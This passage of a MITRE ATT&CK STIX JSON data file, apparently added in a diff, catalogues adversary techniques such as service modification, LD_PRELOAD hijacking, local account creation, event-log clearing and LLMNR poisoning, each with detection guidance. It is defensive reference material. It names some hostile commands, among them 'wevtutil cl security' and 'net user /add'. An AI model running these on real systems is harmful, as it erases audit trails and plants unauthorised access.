CPL", + "description": "Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.", + "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf" + }, + { + "source_name": "This is Security Command Line Confusion", + "description": "B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.", + "url": "https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Modify Existing Service", + "description": "Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075).\n\nAdversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of [Masquerading](https://attack.mitre.org/techniques/T1036) that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.\n\nAdversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands. (Citation: Twitter Service Recovery Nov 2017) (Citation: Microsoft Service Recovery Feb 2013)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Travis Smith, Tripwire", + "Matthew Demaske, Adaptforward" + ], + "x_mitre_detection": "Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence. (Citation: TechNet Autoruns) \n\nService information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services.\n\nCommand-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute [cmd](https://attack.mitre.org/software/S0106) commands or scripts.\n\nLook for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086), so additional logging may need to be configured to gather the appropriate data.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "created": "2017-05-31T21:30:34.928Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1031", + "external_id": "T1031" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/551.html", + "external_id": "CAPEC-551" + }, + { + "source_name": "Twitter Service Recovery Nov 2017", + "description": "The Cyber (@r0wdy_). (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018.", + "url": "https://twitter.com/r0wdy_/status/936365549553991680" + }, + { + "source_name": "Microsoft Service Recovery Feb 2013", + "description": "Microsoft. (2013, February 22). Set up Recovery Actions to Take Place When a Service Fails. Retrieved April 9, 2018.", + "url": "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc753662(v=ws.11)" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Trap", + "description": "Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d.\n\nAdversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where \"command list\" will be executed when \"signals\" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Linux" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--63220765-d418-44de-8fae-694b3912317d", + "created": "2020-01-24T14:17:43.906Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1546/005", + "external_id": "T1546.005" + }, + { + "source_name": "Trap Manual", + "description": "ss64. (n.d.). trap. Retrieved May 21, 2019.", + "url": "https://ss64.com/bash/trap.html" + }, + { + "source_name": "Cyberciti Trap Statements", + "description": "Cyberciti. (2016, March 29). Trap statement. Retrieved May 21, 2019.", + "url": "https://bash.cyberciti.biz/guide/Trap_statement" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Dynamic Linker Hijacking", + "description": "Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)\n\nOn Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the export command, setenv function, or putenv function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher level syntax such Python’s os.environ.\n\nOn Linux, adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD are loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) \n\nOn macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the DYLD_INSERT_LIBRARIES environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD and DYLD_INSERT_LIBRARIES, as well as the commands to implement these changes.\n\nMonitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825", + "created": "2020-03-13T20:09:59.569Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1574/006", + "external_id": "T1574.006" + }, + { + "source_name": "Man LD.SO", + "description": "Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved June 15, 2020.", + "url": "https://www.man7.org/linux/man-pages/man8/ld.so.8.html" + }, + { + "source_name": "TLDP Shared Libraries", + "description": "The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved January 31, 2020.", + "url": "https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html" + }, + { + "source_name": "Apple Doco Archive Dynamic Libraries", + "description": "Apple Inc.. (2012, July 23). Overview of Dynamic Libraries. Retrieved March 24, 2021.", + "url": "https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html" + }, + { + "source_name": "Baeldung LD_PRELOAD", + "description": "baeldung. (2020, August 9). What Is the LD_PRELOAD Trick?. Retrieved March 24, 2021.", + "url": "https://www.baeldung.com/linux/ld_preload-trick-what-is" + }, + { + "source_name": "Code Injection on Linux and macOS", + "description": "Itamar Turner-Trauring. (2017, April 18). “This will only hurt for a moment”: code injection on Linux and macOS with LD_PRELOAD. Retrieved December 20, 2017.", + "url": "https://www.datawire.io/code-injection-on-linux-and-macos/" + }, + { + "source_name": "Uninformed Needle", + "description": "skape. (2003, January 19). Linux x86 run-time process manipulation. Retrieved December 20, 2017.", + "url": "http://hick.org/code/skape/papers/needle.txt" + }, + { + "source_name": "Phrack halfdead 1997", + "description": "halflife. (1997, September 1). Shared Library Redirection Techniques. Retrieved December 20, 2017.", + "url": "http://phrack.org/issues/51/8.html" + }, + { + "source_name": "Brown Exploiting Linkers", + "description": "Tim Brown. (2011, June 29). Breaking the links: Exploiting the linker. Retrieved March 29, 2021.", + "url": "http://www.nth-dimension.org.uk/pub/BTL.pdf" + }, + { + "source_name": "TheEvilBit DYLD_INSERT_LIBRARIES", + "description": "Fitzl, C. (2019, July 9). DYLD_INSERT_LIBRARIES DYLIB injection in macOS / OSX. Retrieved March 26, 2020.", + "url": "https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/" + }, + { + "source_name": "Timac DYLD_INSERT_LIBRARIES", + "description": "Timac. (2012, December 18). Simple code injection using DYLD_INSERT_LIBRARIES. Retrieved March 26, 2020.", + "url": "https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/" + }, + { + "source_name": "Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass", + "description": "Jon Gabilondo. (2019, September 22). How to Inject Code into Mach-O Apps. Part II.. Retrieved March 24, 2021.", + "url": "https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-16T17:40:37.995Z", + "name": "Local Account", + "description": "Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. \n\nFor example, with a sufficient level of access, the Windows net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as username, or to Kubernetes clusters using the `kubectl` utility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security)\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for processes and command-line parameters associated with local account creation, such as net user /add , useradd , and dscl -create . Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary. For network infrastructure devices, collect AAA logging to monitor for account creations.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network", + "Containers" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762", + "created": "2020-01-28T13:50:22.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1136/001", + "external_id": "T1136.001" + }, + { + "source_name": "cisco_username_cmd", + "description": "Cisco. (2023, March 6). username - Cisco IOS Security Command Reference: Commands S to Z. Retrieved July 13, 2022.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-t2.html#wp1047035630" + }, + { + "source_name": "Kubernetes Service Accounts Security", + "description": "Kubernetes. (n.d.). Service Accounts. Retrieved July 14, 2023.", + "url": "https://kubernetes.io/docs/concepts/security/service-accounts/" + }, + { + "source_name": "Microsoft User Creation Event", + "description": "Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account was created. Retrieved June 30, 2017.", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:06.362Z", + "name": "Loss of Productivity and Revenue", + "description": "Adversaries may cause loss of productivity and revenue through disruption and even damage to the availability and integrity of control system operations, devices, and related processes. This technique may manifest as a direct effect of an ICS-targeting attack or tangentially, due to an IT-targeting attack against non-segregated environments. \n\nIn cases where these operations or services are brought to a halt, the loss of productivity may eventually present an impact for the end-users or consumers of products and services. The disrupted supply-chain may result in supply shortages and increased prices, among other consequences. \n\nA ransomware attack on an Australian beverage company resulted in the shutdown of some manufacturing sites, including precautionary halts to protect key systems. (Citation: Paganini, Pierluigi June 2020) The company announced the potential for temporary shortages of their products following the attack. (Citation: Paganini, Pierluigi June 2020) (Citation: Lion Corporation June 2020) \n\nIn the 2021 Colonial Pipeline ransomware incident, the pipeline was unable to transport approximately 2.5 million barrels of fuel per day to the East Coast. (Citation: Colonial Pipeline Company May 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0828", + "external_id": "T0828" + }, + { + "source_name": "Colonial Pipeline Company May 2021", + "description": "Colonial Pipeline Company 2021, May Media Statement Update: Colonial Pipeline System Disruption Retrieved. 2021/10/08 ", + "url": "https://www.colpipe.com/news/press-releases/media-statement-colonial-pipeline-system-disruption" + }, + { + "source_name": "Lion Corporation June 2020", + "description": "Lion Corporation 2020, June 26 Lion Cyber incident update: 26 June 2020 Retrieved. 2021/10/08 ", + "url": "https://lionco.com/2020/06/26/lion-update-re-cyber-issue/" + }, + { + "source_name": "Paganini, Pierluigi June 2020", + "description": "Paganini, Pierluigi 2020, June 14 Ransomware attack disrupts operations at Australian beverage company Lion Retrieved. 2021/10/08 ", + "url": "https://securityaffairs.co/wordpress/104749/cyber-crime/ransomware-attack-hit-lion.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-01-31T03:17:42.004Z", + "name": "Communication Through Removable Media", + "description": "Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system.(Citation: ESET Sednit USBStealer 2014) Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor file access on removable media. Detect processes that execute when removable media is mounted.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef", + "created": "2017-05-31T21:31:09.379Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1092", + "external_id": "T1092" + }, + { + "source_name": "ESET Sednit USBStealer 2014", + "description": "Calvet, J. (2014, November 11). Sednit Espionage Group Attacking Air-Gapped Networks. Retrieved January 4, 2017.", + "url": "http://www.welivesecurity.com/2014/11/11/sednit-espionage-group-attacking-air-gapped-networks/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:06.577Z", + "name": "Spearphishing Attachment", + "description": "Adversaries may use a spearphishing attachment, a variant of spearphishing, as a form of a social engineering attack against specific targets. Spearphishing attachments are different from other forms of spearphishing in that they employ malware attached to an email. All forms of spearphishing are electronically delivered and target a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T0863) to gain execution and access. (Citation: Enterprise ATT&CK October 2019) \n\nA Chinese spearphishing campaign running from December 9, 2011 through February 29, 2012, targeted ONG organizations and their employees. The emails were constructed with a high level of sophistication to convince employees to open the malicious file attachments. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Process: Process Creation", + "File: File Creation", + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0865", + "external_id": "T0865" + }, + { + "source_name": "CISA AA21-201A Pipeline Intrusion July 2021", + "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08 ", + "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf" + }, + { + "source_name": "Enterprise ATT&CK October 2019", + "description": "Enterprise ATT&CK 2019, October 25 Spearphishing Attachment Retrieved. 2019/10/25 ", + "url": "https://attack.mitre.org/techniques/T1193/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T12:40:58.536Z", + "name": "Clear Windows Event Logs", + "description": "Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.\n\n\nWith administrator privileges, the event logs can be cleared with the following utility commands:\n\n* wevtutil cl system\n* wevtutil cl application\n* wevtutil cl security\n\nThese logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command Remove-EventLog -LogName Security to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging)\n\nAdversaries may also attempt to clear logs by directly deleting the stored log files within `C:\\Windows\\System32\\winevt\\logs\\`.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Lucas Heiligenstein" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Deleting Windows event logs (via native binaries (Citation: Microsoft wevtutil Oct 2017), API functions (Citation: Microsoft EventLog.Clear), or [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation: Microsoft Clear-EventLog)) may also generate an alterable event (Event ID 1102: \"The audit log was cleared\").", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti Virus", + "Host Intrusion Prevention Systems", + "Log Analysis" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6495ae23-3ab4-43c5-a94f-5638a2c31fd2", + "created": "2020-01-28T17:05:14.707Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1070/001", + "external_id": "T1070.001" + }, + { + "source_name": "disable_win_evt_logging", + "description": "Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.", + "url": "https://ptylu.github.io/content/report/report.html?report=25" + }, + { + "source_name": "Microsoft Clear-EventLog", + "description": "Microsoft. (n.d.). Clear-EventLog. Retrieved July 2, 2018.", + "url": "https://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventlog" + }, + { + "source_name": "Microsoft EventLog.Clear", + "description": "Microsoft. (n.d.). EventLog.Clear Method (). Retrieved July 2, 2018.", + "url": "https://msdn.microsoft.com/library/system.diagnostics.eventlog.clear.aspx" + }, + { + "source_name": "Microsoft wevtutil Oct 2017", + "description": "Plett, C. et al.. (2017, October 16). wevtutil. Retrieved July 2, 2018.", + "url": "https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-02-28T21:11:27.088Z", + "name": "Email Accounts", + "description": "Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Establishing email accounts may also allow adversaries to abuse free services – such as trial periods – to [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) for follow-on purposes.(Citation: Free Trial PurpleUrchin)\n\nAdversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1)\n\nTo decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--65013dd2-bc61-43e3-afb5-a14c4fa7437a", + "created": "2020-10-01T01:09:53.217Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1585/002", + "external_id": "T1585.002" + }, + { + "source_name": "Trend Micro R980 2016", + "description": "Antazo, F. and Yambao, M. (2016, August 10). R980 Ransomware Found Abusing Disposable Email Address Service. Retrieved October 13, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/r980-ransomware-disposable-email-service/" + }, + { + "source_name": "Free Trial PurpleUrchin", + "description": "Gamazo, William. Quist, Nathaniel.. (2023, January 5). PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources. Retrieved February 28, 2024.", + "url": "https://unit42.paloaltonetworks.com/purpleurchin-steals-cloud-resources/" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-25T14:00:00.188Z", + "name": "LLMNR/NBT-NS Poisoning and SMB Relay", + "description": "By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. \n\nLink-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR)(Citation: TechNet NetBIOS)\n\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords.\n\nIn some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response. \n\nSeveral tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and 